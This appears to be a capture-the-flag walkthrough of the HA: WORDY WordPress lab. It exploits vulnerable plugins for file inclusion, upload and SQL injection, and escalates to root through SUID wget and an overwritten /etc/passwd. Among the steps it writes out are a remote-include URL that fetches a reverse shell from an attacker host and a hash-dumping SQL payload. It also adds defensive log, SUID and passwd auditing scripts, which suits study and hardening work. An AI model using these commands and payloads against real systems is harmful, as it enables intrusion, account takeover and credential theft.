WordPress Asset Discovery
1.1. WordPress Host Discovery
The IP address of this lab target, **HA: WORDY[1]**, is given in advance, so no host discovery step was needed.
1.2. WordPress Service Discovery
Using the command `sudo -u root nmap 172.16.33.108 -n -Pn -p- --reason -sV -sC -O`, the open ports, services provided, components used, and component versions of the host were discovered.

| Open Ports | Services Provided | Components Used | Component Versions |
|---|---|---|---|
| 80/tcp | http | Apache httpd | 2.4.29 |
| – | os | Ubuntu Linux | ? |
2. Vulnerability Discovery (Privilege Escalation)
2.1. WordPress Port 80/HTTP Service Configuration
2.1.1. WordPress Component Vulnerabilities
0x01. Web Middleware
Using the command `searchsploit Apache httpd 2.4.`, no Nday vulnerabilities were found for the Apache httpd 2.4.29 web middleware.
0x02. Web Framework
Using the browser plugin Wappalyzer, no web frameworks with Nday vulnerabilities were found.
2.1.2. WordPress URL Vulnerabilities: RFI, File Upload
0x01. Direct Access
Opening `http://172.16.33.108/` in a browser only displayed the web middleware’s default page.
0x02. Directory Scanning (dirsearch)
Using the command `dirsearch -u http://172.16.33.108/ -x 403` to scan the website’s directories and files and checking them individually, only the `/wordpress/wp-login.php` file was valuable.
Using the command `wpscan --url http://172.16.33.108/wordpress/ --enumerate u` to scan WordPress users, the users `admin` and `aarti` were discovered.
Using the command `wpscan --url http://172.16.33.108/wordpress/ --usernames admin,aarti --passwords /usr/share/wordlists/rockyou.txt` to brute-force the passwords of these two users, 120,000 passwords were tested for each user over two hours without success.
Using the command `wpscan --url http://172.16.33.108/wordpress/` to scan WordPress plugins, 7 plugins were found.
01. mail-masta 1.0 Plugin (RFI)
Using the command `searchsploit mail masta`, two Nday vulnerabilities were found for the mail-masta 1.0 plugin: Local File Inclusion (LFI) and SQL injection (SQLi).
Using the command `searchsploit -m 40290`, the exploit for the LFI vulnerability was copied to the current directory. The command `cat 40290.txt` was used to view the vulnerable URL. The URL `http://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd` was constructed and accessed in the browser, successfully retrieving the `/etc/passwd` file, confirming the existence of the LFI vulnerability.
To check whether the inclusion could also be used remotely (RFI) to gain shell access, the command `cp /usr/share/webshells/php/php-reverse-shell.php ./` was used to copy the reverse webshell to the current directory. The command `vim php-reverse-shell.php` was used to modify the listening IP and port in the “CHANGE THIS” section. The command `python3 -m http.server` was used to set up a web server for the target machine to download the reverse webshell. The command `nc -nvlp 33108` was used to listen for the reverse shell. The URL `http://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=http://10.8.0.110:8000/php-reverse-shell.php` was constructed and accessed in the browser, successfully obtaining a shell with `www-data` user privileges, thus breaching the boundary.
Using the command `searchsploit -m 41438`, the exploit for the SQLi vulnerability was copied to the current directory. The command `cat 41438.txt` was used to view the details. There were four SQLi vulnerabilities, but the second to fourth required admin login, while the first did not. The URL `http://172.16.33.108/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php` was constructed and accessed, resulting in an `export.csv` file, but it contained only the word “Email”.
02. reflex-gallery 3.1.3 Plugin (File Upload)
Using the command `searchsploit reflex gallery`, one Nday vulnerability was found for the reflex-gallery 3.1.3 plugin: arbitrary file upload. Using the command `searchsploit -m 36374`, the exploit was copied to the current directory. The command `cat 36374.txt` was used to view the exploit details, which provided the file upload exploit page and the URL after the file upload.
After editing the file upload exploit page using `vim 36374.html` and setting up a web server with `python3 -m http.server`, accessing the file upload exploit page `http://127.0.0.1:8000/36374.html` and uploading the modified reverse webshell `/usr/share/webshells/php/php-reverse-shell.php` resulted in an error: `{"error":"Directory does not exist and could not be created."}`.
Analysis showed that the directory for uploading files did not exist and could not be created, so an existing upload directory was looked for instead. Two directories, `2019-09` and `2022-11`, were found. After modifying the file upload exploit page, the reverse webshell was successfully uploaded.
After listening on the port using `nc -nvlp 33108`, accessing the reverse webshell URL `http://172.16.33.108/wordpress/wp-content/uploads/2019/09/php-reverse-shell.php` in the browser successfully granted `www-data` user privileges.
03. site-editor 1.1.1 Plugin (LFI)
Using the command `searchsploit WordPress site editor`, one Nday vulnerability was found for the site-editor 1.1.1 plugin: Local File Inclusion (LFI). Using the command `searchsploit -m 44340`, the exploit was copied to the current directory. The command `cat 44340.txt` was used to obtain the vulnerable URL. The URL `http://172.16.33.108/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd` was constructed and accessed in the browser, successfully retrieving the `/etc/passwd` file, confirming the existence of the LFI vulnerability.
To check whether the inclusion could also be used remotely (RFI) to gain shell access, the command `cp /usr/share/webshells/php/php-reverse-shell.php ./` was used to copy the reverse webshell to the current directory. The command `vim php-reverse-shell.php` was used to modify the listening IP and port in the “CHANGE THIS” section. The command `python3 -m http.server` was used to set up a web server for the target machine to download the reverse webshell. The command `nc -nvlp 33108` was used to listen for the reverse shell. The URL `http://172.16.33.108/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=http://10.8.0.110:8000/php-reverse-shell.php` was constructed and accessed in the browser, resulting in an error: `{"success":false,"message":"Error: didn't load shortcodes pattern file"}`. It appears that a remote file inclusion vulnerability does not exist.
Further attempts to access other Linux files and execute commands were unsuccessful.
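The `pl=` and `ajax_path=` requests made against mail-masta and site-editor above leave a recognisable trace in the Apache access log: a plugin PHP file requested directly with a filesystem path or a URL as a parameter value. The detector below is an added example, not part of the original write-up; the log lines are constructed, and the function names and the list of path prefixes are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log line: client, method, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Any scheme:// prefix; a file-path parameter should never carry a URL.
URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)
# Assumed list of directories a web request has no reason to name.
LOCAL_PREFIXES = ("/etc/", "/proc/", "/var/", "/home/", "/root/")

def classify(value):
    """Label one decoded query value: 'remote-include', 'local-path' or None."""
    if URL_RE.match(value):
        return "remote-include"
    if "../" in value or value.startswith(LOCAL_PREFIXES):
        return "local-path"
    return None

def scan(lines):
    """Flag direct requests to plugin PHP files whose parameters carry a path or URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        # Both endpoints on this page are plugin scripts requested directly;
        # scoping to them keeps wp-login.php?redirect_to=... out of the results.
        if "/wp-content/plugins/" not in parts.path or not parts.path.endswith(".php"):
            continue
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            kind = classify(value)          # parse_qsl has already percent-decoded
            if kind:
                findings.append({"client": client, "param": name, "kind": kind,
                                 "script": parts.path.rsplit("/", 1)[-1],
                                 "status": int(status)})
    return findings

# Constructed sample log lines (timestamps, sizes and the last client are made up).
P, TS = "/wordpress/wp-content/plugins", "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'10.8.0.110 - - {TS} "GET {P}/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1612',
    f'10.8.0.110 - - {TS} "GET {P}/mail-masta/inc/campaign/count_of_send.php?pl=http://10.8.0.110:8000/php-reverse-shell.php HTTP/1.1" 200 0',
    f'10.8.0.110 - - {TS} "GET {P}/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=%2Fetc%2Fpasswd HTTP/1.1" 200 1700',
    f'192.0.2.7 - - {TS} "GET /wordpress/wp-login.php?redirect_to=http%3A%2F%2F172.16.33.108%2Fwordpress%2Fwp-admin%2F HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A `remote-include` hit answered with status 200 deserves immediate attention, since PHP only follows an `http://` include when `allow_url_include` is enabled; setting it to `Off` (the PHP default) blocks the remote variant, while the local-path reads still require removing or patching the plugins.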
04. slideshow-gallery 1.4.6 Plugin
Using the command `searchsploit slideshow gallery 1.4.6`, one Nday vulnerability was found for the slideshow-gallery 1.4.6 plugin: arbitrary file upload. Using the command `searchsploit -m 34514`, the exploit was copied to the current directory. The command `cat 34514.txt` was used to view the exploit details, which required admin privileges, so it was abandoned.
05. wp-easycart-data Plugin
Using the command `searchsploit easycart data`, no Nday vulnerabilities were found for the wp-easycart-data plugin.
06. wp-support-plus-responsive-ticket-system 7.1.3 Plugin
Using the command `searchsploit wp support plus responsive ticket system`, two Nday vulnerabilities were found for the wp-support-plus-responsive-ticket-system 7.1.3 plugin: SQLi and privilege escalation.
Using the command `searchsploit -m 40939`, the exploit for the SQLi vulnerability was copied to the current directory. The command `cat 40939.txt` was used to view the exploit details, which required an admin account, so it was abandoned.
Using the command `searchsploit -m 41006`, the exploit for the privilege escalation vulnerability was copied to the current directory. The command `cat 41006.txt` was used to view the exploit details, which required an admin account, so it was abandoned.
07. wp-symposium 15.1 Plugin (SQLi)
Using the command `searchsploit wp symposium 15.1`, three Nday vulnerabilities were found for the wp-symposium 15.1 plugin, all SQLi.
Using the command `cat 37080.txt` to view the first exploit details, three payloads were tested, but the SQLi vulnerability was not found.
Using the command `cat 37824.txt` to view the second exploit details and constructing a vulnerability verification URL `http://172.16.33.108/wordpress/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--`, a successful response was obtained, confirming the vulnerability’s existence.
A POC `concat(user_login,char(58),user_pass) from wordpress.wp_users;--` was constructed and URL-encoded to read the WordPress user password, obtaining `admin:$P$BYWgfD7pa572QS9YFoeVVmhrIhBAx0.`. However, neither CMD5[2] nor SOMD5[3] could recover the plaintext for this hash. Since wpscan failed to crack the password after two hours of testing 120,000 passwords, creating a rainbow table was abandoned.
Attempts to reset the admin password failed because sqlmap identified the injection point as not supporting stacked queries, preventing the execution of the UPDATE statement.
Using the command `cat 37822.txt` to view the third exploit details and comparing the response of the constructed vulnerability verification payload with a normal request, both requests showed the same 21-second delay, indicating no time-based SQL injection.
0x02. Directory Scanning (dirb)
Using the command `dirb http://172.16.33.108/ -X .txt,.zip` to scan the website’s directories and files, two files were found. The `/notes.txt` file suggests paying attention to ZIP files, while the `secret.zip` file contains a `link.txt` file, requiring a password to extract. However, attempts to crack the password using `/usr/share/john/password.lst` and `/usr/share/wordlists/rockyou.txt` (totaling 14.34 million passwords) failed.
0x03. Fuzzing
Based on the current information, fuzzing the website’s directories and files is unnecessary.
0x04. Protocol Switching
Accessing `https://172.16.33.108:80/` in the browser showed that the website was not using the SSL protocol.
3. Privilege Escalation
Using the commands `which python` and `which python3` to check which version of Python the target machine uses, Python3 was found. Using the command `python3 -c 'import pty; pty.spawn("/bin/bash")'`, an interactive shell was obtained.
3.1. www-data User
3.1.1. sudo
Using the command `sudo -l` to view the commands that can be executed with other users’ privileges, it was found that the current user’s password was needed. Since this password was unavailable, the attempt was abandoned.
3.1.2. SUID: wget, cp
Using the command `find / -perm -u=s -type f -ls 2>/dev/null` to check which commands are executed with the owner’s privileges, several commands were found.
Checking each command in GTFOBins[4] for privilege escalation possibilities, `/usr/bin/wget` was found to be exploitable. Executing `TF=$(mktemp)`, `chmod +x $TF`, `echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF`, and `/usr/bin/wget --use-askpass=$TF 0` resulted in obtaining root privileges, successfully completing privilege escalation.
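The same `find ... -ls` listing is what an administrator would audit to catch the misconfiguration used here. The script below is an added example, not part of the original write-up: it parses that output and reports set-uid files outside an expected baseline. The baseline set, the sample listing (including the path of `cp` and the `/opt` entry) and the function names are assumptions.

```python
import os

# Assumed baseline: set-uid binaries this host is expected to ship with.
BASELINE = {"/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
            "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh"}
# General-purpose file tools the page found set-uid (section 3.1.2).
FILE_TOOLS = {"wget", "cp"}

def parse_find_ls(text):
    """Yield (mode, owner, path) from `find ... -ls` output lines."""
    for line in text.splitlines():
        fields = line.split(None, 10)  # 11th field is the path; it may contain spaces
        if len(fields) == 11:
            yield fields[2], fields[4], fields[10]

def audit(find_output, baseline=BASELINE):
    """Return set-uid files outside the baseline, most dangerous first."""
    findings = []
    for mode, owner, path in parse_find_ls(find_output):
        # The owner-execute slot (4th character) shows s/S when set-uid is on.
        if len(mode) < 4 or mode[3] not in "sS" or path in baseline:
            continue
        if owner != "root":
            severity = "review"
        elif os.path.basename(path) in FILE_TOOLS:
            severity = "critical"  # root-owned tool that reads or writes arbitrary files
        else:
            severity = "high"
        findings.append({"path": path, "owner": owner, "severity": severity})
    order = {"critical": 0, "high": 1, "review": 2}
    return sorted(findings, key=lambda f: order[f["severity"]])

# Constructed sample of `find / -perm -u=s -type f -ls` output.
SAMPLE_FIND = """
   131145     44 -rwsr-xr-x   1 root     root        44664 Mar 22  2019 /bin/su
   131120     44 -rwsr-xr-x   1 root     root        43088 Oct 15  2018 /bin/mount
   400010     12 -rwsr-xr-x   1 backup   backup       9000 Jan  5  2020 /opt/tools/sync helper
   262301    488 -rwsr-xr-x   1 root     root       499264 Apr  8  2019 /usr/bin/wget
   131090    140 -rwsr-xr-x   1 root     root       141528 Jan 18  2018 /bin/cp
   262250     60 -rwsr-xr-x   1 root     root        59640 Mar 22  2019 /usr/bin/passwd
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_FIND):
        print(f"{f['severity']:8} {f['owner']:8} {f['path']}  ->  chmod u-s '{f['path']}'")
```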
It’s also possible to add a privileged user to `/etc/passwd` for privilege escalation. First, the command `cat /etc/passwd` was used on the target machine and the output copied locally.
Then, using the command `openssl passwd -6 -salt salt 123456`, a SHA-512 crypt hash of the password “123456” was generated locally. Based on the `/etc/passwd` file from the target machine, a new `/etc/passwd` file was created using `vim passwd`, adding a privileged account `hacker` with password `123456`. A web server was then started with `python3 -m http.server` to allow the target machine to download the file.
Finally, the target machine downloaded the new `/etc/passwd` file using `wget http://10.8.0.110:8000/passwd -O /etc/passwd`, overwriting the old one. Using `su hacker` and the password `123456`, it was possible to switch to the root-privileged `hacker` user, successfully completing privilege escalation.
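An overwritten `/etc/passwd` of this kind is easy to spot after the fact: it contains a second UID 0 account and a password hash in a field that normally holds `x`. The checker below is an added example, not part of the original write-up; the sample file content (with a placeholder instead of a real hash), the known-user set and the function name are assumptions.

```python
def audit_passwd(text, known_users=None):
    """Return (line_number, account, issue) tuples for suspicious passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry"))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if known_users is not None and name not in known_users:
            findings.append((lineno, name, "account not in baseline"))
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((lineno, name, "UID 0 account other than root"))
        if password == "":
            findings.append((lineno, name, "empty password field"))
        elif password != "x" and not password.startswith(("*", "!")):
            # Anything else is a usable hash kept outside /etc/shadow.
            findings.append((lineno, name, "password hash in passwd, not shadow"))
    return findings

# Constructed sample: the hash is a placeholder, not output of openssl.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
hacker:$6$salt$CONSTRUCTED.PLACEHOLDER.HASH:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, known_users={"root", "www-data"}):
        print(finding)
```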